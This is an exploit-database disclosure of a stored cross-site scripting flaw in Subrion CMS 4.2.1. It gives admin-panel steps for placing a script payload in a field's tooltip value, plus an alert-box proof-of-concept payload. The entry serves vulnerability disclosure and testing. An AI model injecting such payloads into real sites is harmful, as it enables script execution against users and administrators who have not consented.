Subrion CMS 4.2.1 – Stored Cross-Site Scripting (XSS)

  • 作者: Sinem Şahin
    日期: 2023-03-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51110/
  • # Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
    # Date: 2022-08-10
    # Exploit Author: Sinem Şahin
    # Vendor Homepage: https://intelliants.com/
    # Version: 4.2.1
    # Tested on: Windows & XAMPP
    
    ==> Tutorial <==
    
    1- Go to the following url. => http://(HOST)/panel/fields/add
    2- Write XSS Payload into the tooltip value of the field add page.
    3- Press "Save" button.
    4- Go to the following url. => http://(HOST)/panel/members/add
    
    XSS Payload ==> "<script>alert("field_tooltip_XSS")</script> 
    
    Reference: ://github.com/intelliants/subrion/issues/895